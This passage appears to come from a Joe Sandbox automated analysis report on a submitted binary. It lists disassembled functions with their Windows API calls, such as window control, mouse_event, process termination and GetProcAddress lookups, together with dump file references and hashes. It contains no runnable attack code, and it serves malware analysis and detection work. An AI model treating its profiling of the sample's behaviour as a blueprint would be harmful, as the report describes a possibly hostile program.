                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2592858361-0
                                                                                                                  • Opcode ID: 8aaeebf5fcbdb83c12aaf7e6b8bbe2ec886996cd5bcb321a5b90d975ee0d829d
                                                                                                                  • Instruction ID: 9f5204c35ffb72fd732378b9fc1ac6a2f3ab987e081a460de9349931be3757a6
                                                                                                                  • Opcode Fuzzy Hash: 8aaeebf5fcbdb83c12aaf7e6b8bbe2ec886996cd5bcb321a5b90d975ee0d829d
                                                                                                                  • Instruction Fuzzy Hash: 9341D3B05043059FC710DF19DC84F7B7BE8EB5A360F084659FAA8972A1C770A948DB72
                                                                                                                  Function 00E4E397 Relevance: 9.1, APIs: 6, Instructions: 108windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • ShowWindow.USER32(00EA1628,00000000,00EA1628,00000000,00000000,00EA1628,?,00E5DC5D,00000000,?,00000000,00000000,00000000,?,00E5DAD1,00000004), ref: 00E4E40B
                                                                                                                  • EnableWindow.USER32(00000000,00000000), ref: 00E4E42F
                                                                                                                  • ShowWindow.USER32(00EA1628,00000000), ref: 00E4E48F
                                                                                                                  • ShowWindow.USER32(00000000,00000004), ref: 00E4E4A1
                                                                                                                  • EnableWindow.USER32(00000000,00000001), ref: 00E4E4C5
                                                                                                                  • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00E4E4E8
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$Show$Enable$MessageSend
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 642888154-0
                                                                                                                  • Opcode ID: 17d5eb17be4da835389d77e9592d21b42b56ce5ed89eadb8fd6e25bfeca2daff
                                                                                                                  • Instruction ID: f69cb1b6de8d3d31ef6dfa6a5a0fc990f823ab34595406a00ba2b79054e99d2c
                                                                                                                  • Opcode Fuzzy Hash: 17d5eb17be4da835389d77e9592d21b42b56ce5ed89eadb8fd6e25bfeca2daff
                                                                                                                  • Instruction Fuzzy Hash: D0418230601140EFDB22CF24E899B947BE1FF09318F5951B9EA69AF3A2C771E845CB51
                                                                                                                  Function 00E298BA Relevance: 9.1, APIs: 6, Instructions: 100fileCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • InterlockedExchange.KERNEL32(?,000001F5), ref: 00E298D1
                                                                                                                    • Part of subcall function 00DFF4EA: std::exception::exception.LIBCMT ref: 00DFF51E
                                                                                                                    • Part of subcall function 00DFF4EA: __CxxThrowException@8.LIBCMT ref: 00DFF533
                                                                                                                  • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00E29908
                                                                                                                  • RtlEnterCriticalSection.NTDLL(?), ref: 00E29924
                                                                                                                  • RtlLeaveCriticalSection.NTDLL(?), ref: 00E2999E
                                                                                                                  • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00E299B3
                                                                                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 00E299D2
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2537439066-0
                                                                                                                  • Opcode ID: f9d537f6bcd1ed0da7a275d78a8b99f53eb52fcde22af931bfb8fb555229cce5
                                                                                                                  • Instruction ID: 95372bd54a5c071da081ad073f9238d6887e515df9976cf8cdc595a8f066cf0c
                                                                                                                  • Opcode Fuzzy Hash: f9d537f6bcd1ed0da7a275d78a8b99f53eb52fcde22af931bfb8fb555229cce5
                                                                                                                  • Instruction Fuzzy Hash: 45318F31A00115AFDB00AFA5EC85EAFB7B8FF85710F1580A9F904AB256D774DA14CBB0
                                                                                                                  Function 00E39B45 Relevance: 9.1, APIs: 6, Instructions: 99COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetForegroundWindow.USER32(?,?,?,?,?,?,00E377F4,?,?,00000000,00000001), ref: 00E39B53
                                                                                                                    • Part of subcall function 00E36544: GetWindowRect.USER32(?,?), ref: 00E36557
                                                                                                                  • GetDesktopWindow.USER32 ref: 00E39B7D
                                                                                                                  • GetWindowRect.USER32(00000000), ref: 00E39B84
                                                                                                                  • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00E39BB6
                                                                                                                    • Part of subcall function 00E27A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00E27AD0
                                                                                                                  • GetCursorPos.USER32(?), ref: 00E39BE2
                                                                                                                  • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00E39C44
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4137160315-0
                                                                                                                  • Opcode ID: fc968b5b33d9c846d7023d031967ea547b6e857ded01445da4aeb050b68fef62
                                                                                                                  • Instruction ID: 73867867ee9840ec37103dcf1abd5cc4a0f1db82f0083443b1a34d70b5ff9997
                                                                                                                  • Opcode Fuzzy Hash: fc968b5b33d9c846d7023d031967ea547b6e857ded01445da4aeb050b68fef62
                                                                                                                  • Instruction Fuzzy Hash: C031C272608315AFD710DF15EC49A9BBBE9FF88354F00191AF585E7182D7B1E908CB91
                                                                                                                  Function 00E4EBF6 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DFAF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00DFAFE3
                                                                                                                    • Part of subcall function 00DFAF83: SelectObject.GDI32(?,00000000), ref: 00DFAFF2
                                                                                                                    • Part of subcall function 00DFAF83: BeginPath.GDI32(?), ref: 00DFB009
                                                                                                                    • Part of subcall function 00DFAF83: SelectObject.GDI32(?,00000000), ref: 00DFB033
                                                                                                                  • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00E4EC20
                                                                                                                  • LineTo.GDI32(00000000,00000003,?), ref: 00E4EC34
                                                                                                                  • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00E4EC42
                                                                                                                  • LineTo.GDI32(00000000,00000000,?), ref: 00E4EC52
                                                                                                                  • EndPath.GDI32(00000000), ref: 00E4EC62
                                                                                                                  • StrokePath.GDI32(00000000), ref: 00E4EC72
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 43455801-0
                                                                                                                  • Opcode ID: 0ad9d10ed2d530776fb5c10053915f2552b353104dd3aa034194df91abbf9675
                                                                                                                  • Instruction ID: 8e67cf3161f21e481bb2e99bb9f1ba4425d84fbd05ec4cbdeebf2f4806597fb3
                                                                                                                  • Opcode Fuzzy Hash: 0ad9d10ed2d530776fb5c10053915f2552b353104dd3aa034194df91abbf9675
                                                                                                                  • Instruction Fuzzy Hash: 0211F772504149BFEB029F91ED88EEA7F6DEB08394F048112FE18A9160D7B19D599BA0
                                                                                                                  Function 00E1E19B Relevance: 9.0, APIs: 6, Instructions: 48COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetDC.USER32(00000000), ref: 00E1E1C0
                                                                                                                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 00E1E1D1
                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00E1E1D8
                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 00E1E1E0
                                                                                                                  • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00E1E1F7
                                                                                                                  • MulDiv.KERNEL32(000009EC,?,?), ref: 00E1E209
                                                                                                                    • Part of subcall function 00E19AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00E19A05,00000000,00000000,?,00E19DDB), ref: 00E1A53A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CapsDevice$ExceptionRaiseRelease
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 603618608-0
                                                                                                                  • Opcode ID: 170193e4be13bd920c527eea222e885824bc323c9cd6723169464abe76be29d4
                                                                                                                  • Instruction ID: 9de2dcf62287beef7beef210550a1edde6c6203142c75115f9c71374db9e2d04
                                                                                                                  • Opcode Fuzzy Hash: 170193e4be13bd920c527eea222e885824bc323c9cd6723169464abe76be29d4
                                                                                                                  • Instruction Fuzzy Hash: 0A0171B5F00214BFEB109BA69C45B5EBFB9EB48351F004066EE04B7390D6B09C048B60
                                                                                                                  Function 00E07B47 Relevance: 9.0, APIs: 6, Instructions: 45threadCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • __init_pointers.LIBCMT ref: 00E07B47
                                                                                                                    • Part of subcall function 00E0123A: __initp_misc_winsig.LIBCMT ref: 00E0125E
                                                                                                                    • Part of subcall function 00E0123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00E07F51
                                                                                                                    • Part of subcall function 00E0123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00E07F65
                                                                                                                    • Part of subcall function 00E0123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00E07F78
                                                                                                                    • Part of subcall function 00E0123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00E07F8B
                                                                                                                    • Part of subcall function 00E0123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00E07F9E
                                                                                                                    • Part of subcall function 00E0123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00E07FB1
                                                                                                                    • Part of subcall function 00E0123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00E07FC4
                                                                                                                    • Part of subcall function 00E0123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00E07FD7
                                                                                                                    • Part of subcall function 00E0123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00E07FEA
                                                                                                                    • Part of subcall function 00E0123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00E07FFD
                                                                                                                    • Part of subcall function 00E0123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00E08010
                                                                                                                    • Part of subcall function 00E0123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00E08023
                                                                                                                    • Part of subcall function 00E0123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00E08036
                                                                                                                    • Part of subcall function 00E0123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00E08049
                                                                                                                    • Part of subcall function 00E0123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00E0805C
                                                                                                                    • Part of subcall function 00E0123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00E0806F
                                                                                                                  • __mtinitlocks.LIBCMT ref: 00E07B4C
                                                                                                                    • Part of subcall function 00E07E23: InitializeCriticalSectionAndSpinCount.KERNEL32(00E9AC68,00000FA0,?,?,00E07B51,00E05E77,00E96C70,00000014), ref: 00E07E41
                                                                                                                  • __mtterm.LIBCMT ref: 00E07B55
                                                                                                                    • Part of subcall function 00E07BBD: RtlDeleteCriticalSection.NTDLL(00000000), ref: 00E07D3F
                                                                                                                    • Part of subcall function 00E07BBD: _free.LIBCMT ref: 00E07D46
                                                                                                                    • Part of subcall function 00E07BBD: RtlDeleteCriticalSection.NTDLL(00E9AC68), ref: 00E07D68
                                                                                                                  • __calloc_crt.LIBCMT ref: 00E07B7A
                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00E07BA3
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2942034483-0
                                                                                                                  • Opcode ID: 40acabd5ab83ae084aa62590afe3752ed1c11624764f8981f54e708081438419
                                                                                                                  • Instruction ID: d8e830454112b81ec28eb2827aa49f66d8b9d087e27e5664078ad31a4a30f516
                                                                                                                  • Opcode Fuzzy Hash: 40acabd5ab83ae084aa62590afe3752ed1c11624764f8981f54e708081438419
                                                                                                                  • Instruction Fuzzy Hash: 84F06232E1D3521DE6287635BC0664A3AD59F01734B2426AAF8E0F50D2EB60B8C249A0
                                                                                                                  Function 00DE27EC Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00DE281D
                                                                                                                  • MapVirtualKeyW.USER32(00000010,00000000), ref: 00DE2825
                                                                                                                  • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00DE2830
                                                                                                                  • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00DE283B
                                                                                                                  • MapVirtualKeyW.USER32(00000011,00000000), ref: 00DE2843
                                                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00DE284B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Virtual
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4278518827-0
                                                                                                                  • Opcode ID: 31e1fb680dac2cd8e4e8c347c170083f48588a492b7076a3c1018e539145c463
                                                                                                                  • Instruction ID: 3767bfe04b53324de80c107ab4facf956f08b1a0357c97b05b0a19891a8ed32c
                                                                                                                  • Opcode Fuzzy Hash: 31e1fb680dac2cd8e4e8c347c170083f48588a492b7076a3c1018e539145c463
                                                                                                                  • Instruction Fuzzy Hash: 020148B0901B597DE3008F6A8C85A56FEA8FF19354F00411BD15C47941C7F5A864CBE5
                                                                                                                  Function 00E29AD5 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1423608774-0
                                                                                                                  • Opcode ID: 606e796e99269640748f03a1b58a7b42e60b833930267387342d2ee9dccd3db9
                                                                                                                  • Instruction ID: 23bc00a5aec61c3589e656ccd40955e9f37540798e5dcf50fcd1906eaffc6ded
                                                                                                                  • Opcode Fuzzy Hash: 606e796e99269640748f03a1b58a7b42e60b833930267387342d2ee9dccd3db9
                                                                                                                  • Instruction Fuzzy Hash: 8701F972A05321AFD7151B56FC59DEF7769FF88741F442029F503B20A2DBB49804CB50
                                                                                                                  Function 00E27BF7 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00E27C07
                                                                                                                  • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00E27C1D
                                                                                                                  • GetWindowThreadProcessId.USER32(?,?), ref: 00E27C2C
                                                                                                                  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E27C3B
                                                                                                                  • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E27C45
                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E27C4C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 839392675-0
                                                                                                                  • Opcode ID: 6a692cf4c6a850066d2e7cee52b677756349c46ed8fd44f706cd36e3e36ea0a7
                                                                                                                  • Instruction ID: a6273f5daeedeae699278368f69170a6a9693daaaf3421ffebdf73ede2ded60f
                                                                                                                  • Opcode Fuzzy Hash: 6a692cf4c6a850066d2e7cee52b677756349c46ed8fd44f706cd36e3e36ea0a7
                                                                                                                  • Instruction Fuzzy Hash: FAF01D72646158BFE6215753EC0EEEF7B7CDBCAB55F400018F601A1061D7E05A45C6B5
                                                                                                                  Function 00E29A20 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • InterlockedExchange.KERNEL32(?,?), ref: 00E29A33
                                                                                                                  • RtlEnterCriticalSection.NTDLL(?), ref: 00E29A44
                                                                                                                  • TerminateThread.KERNEL32(?,000001F6,?,?,?,00E55DEE,?,?,?,?,?,00DEED63), ref: 00E29A51
                                                                                                                  • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00E55DEE,?,?,?,?,?,00DEED63), ref: 00E29A5E
                                                                                                                    • Part of subcall function 00E293D1: CloseHandle.KERNEL32(?,?,00E29A6B,?,?,?,00E55DEE,?,?,?,?,?,00DEED63), ref: 00E293DB
                                                                                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 00E29A71
                                                                                                                  • RtlLeaveCriticalSection.NTDLL(?), ref: 00E29A78
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3495660284-0
                                                                                                                  • Opcode ID: 1e48e07dae2d0e4e7ae5567c1d47bd8e3f0e0a542e0b0f9cc49659a827ed87af
                                                                                                                  • Instruction ID: 2c1c9e9a6c2913236e385a0f8b214366ed357288a8b82d1e3832fae2b6dc4643
                                                                                                                  • Opcode Fuzzy Hash: 1e48e07dae2d0e4e7ae5567c1d47bd8e3f0e0a542e0b0f9cc49659a827ed87af
